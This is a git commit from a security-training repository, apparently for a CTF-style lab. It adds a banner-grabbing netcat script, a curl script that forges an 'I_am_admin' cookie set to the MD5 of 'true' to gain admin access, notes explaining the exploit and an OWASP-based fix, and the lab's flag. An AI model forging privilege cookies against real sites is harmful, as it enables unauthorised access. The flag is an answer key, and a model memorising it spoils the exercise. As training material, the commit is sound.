diff options
| author | Thomas Vanbesien <tvanbesi@proton.me> | 2026-03-27 11:03:57 +0100 |
|---|---|---|
| committer | Thomas Vanbesien <tvanbesi@proton.me> | 2026-03-27 11:04:59 +0100 |
| commit | 3e0d34c9c02d467ac53842edd5949416c52a0bc4 (patch) | |
| tree | 7014b2ccf6cdfb9219786c4d2433857a0db44d50 /Cookie tampering | |
| parent | 32997d1f6dcedfeb7c7e094fce1626ee54e529ff (diff) | |
| download | darkly-3e0d34c9c02d467ac53842edd5949416c52a0bc4.tar.gz darkly-3e0d34c9c02d467ac53842edd5949416c52a0bc4.zip | |
Add cookie tampering solution
Diffstat (limited to 'Cookie tampering')
| -rwxr-xr-x | Cookie tampering/Resources/banner_grabbing.bash | 3 | ||||
| -rwxr-xr-x | Cookie tampering/Resources/cookie_tamper.bash | 3 | ||||
| -rw-r--r-- | Cookie tampering/Resources/notes.md | 21 | ||||
| -rw-r--r-- | Cookie tampering/flag | 1 |
4 files changed, 28 insertions, 0 deletions
diff --git a/Cookie tampering/Resources/banner_grabbing.bash b/Cookie tampering/Resources/banner_grabbing.bash new file mode 100755 index 0000000..e17a0b2 --- /dev/null +++ b/Cookie tampering/Resources/banner_grabbing.bash @@ -0,0 +1,3 @@ +#!/usr/bin/bash + +printf 'HEAD / HTTP/1.0\r\n\r\n' | nc 10.0.2.15 80 diff --git a/Cookie tampering/Resources/cookie_tamper.bash b/Cookie tampering/Resources/cookie_tamper.bash new file mode 100755 index 0000000..314ff2f --- /dev/null +++ b/Cookie tampering/Resources/cookie_tamper.bash @@ -0,0 +1,3 @@ +#!/usr/bin/bash + +curl --cookie I_am_admin=b326b5062b2f0e69046810717534cb09 http://10.0.2.15 | grep Flag diff --git a/Cookie tampering/Resources/notes.md b/Cookie tampering/Resources/notes.md new file mode 100644 index 0000000..b372042 --- /dev/null +++ b/Cookie tampering/Resources/notes.md @@ -0,0 +1,21 @@ +## Exploit + +1. Did [banner grabbing](https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/01-Information_Gathering/02-Fingerprint_Web_Server) and noticed an interesting cookie name: + ```bash + ❯ printf 'HEAD / HTTP/1.0\r\n\r\n' | nc 10.0.2.15 80 + HTTP/1.1 200 OK + Server: nginx/1.4.6 (Ubuntu) + Date: Fri, 27 Mar 2026 09:43:20 GMT + Content-Type: text/html + Connection: close + X-Powered-By: PHP/5.5.9-1ubuntu4.29 + Set-Cookie: I_am_admin=68934a3e9455fa72420237eb05902327; expires=Fri, 27-Mar-2026 10:43:20 GMT; Max-Age=3600 + ``` +1. Reverse looked up the md5 value `68934a3e9455fa72420237eb05902327` → `false` +1. Intuited to send a request to the website with the cookie value set to the md5 hash value `true` to get the flag. Test it with `cookie_poison.bash` or directly in Firefox: **F12** → **Storage** → **Cookies**. + +## Fix + +[https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/06-Session_Management_Testing/01-Testing_for_Session_Management_Schema]() + +Returning a cookie is not the problem, since cookies can be necessary, or useful for holding non-sensitive data (like settings). The problem is what the cookie contains. It is pretty obvious what the cookie is for by its name "I_am_admin". Cookies are stored client-side so they should not be trusted by the server for giving user privileges. A secure approach would be sending a "session_id" cookie with a random identifier and then look up in a database the privileges associated with the given session. diff --git a/Cookie tampering/flag b/Cookie tampering/flag new file mode 100644 index 0000000..3f979c7 --- /dev/null +++ b/Cookie tampering/flag @@ -0,0 +1 @@ +df2eb4ba34ed059a1e3e89ff4dfc13445f104a1a52295214def1c4fb1693a5c3 |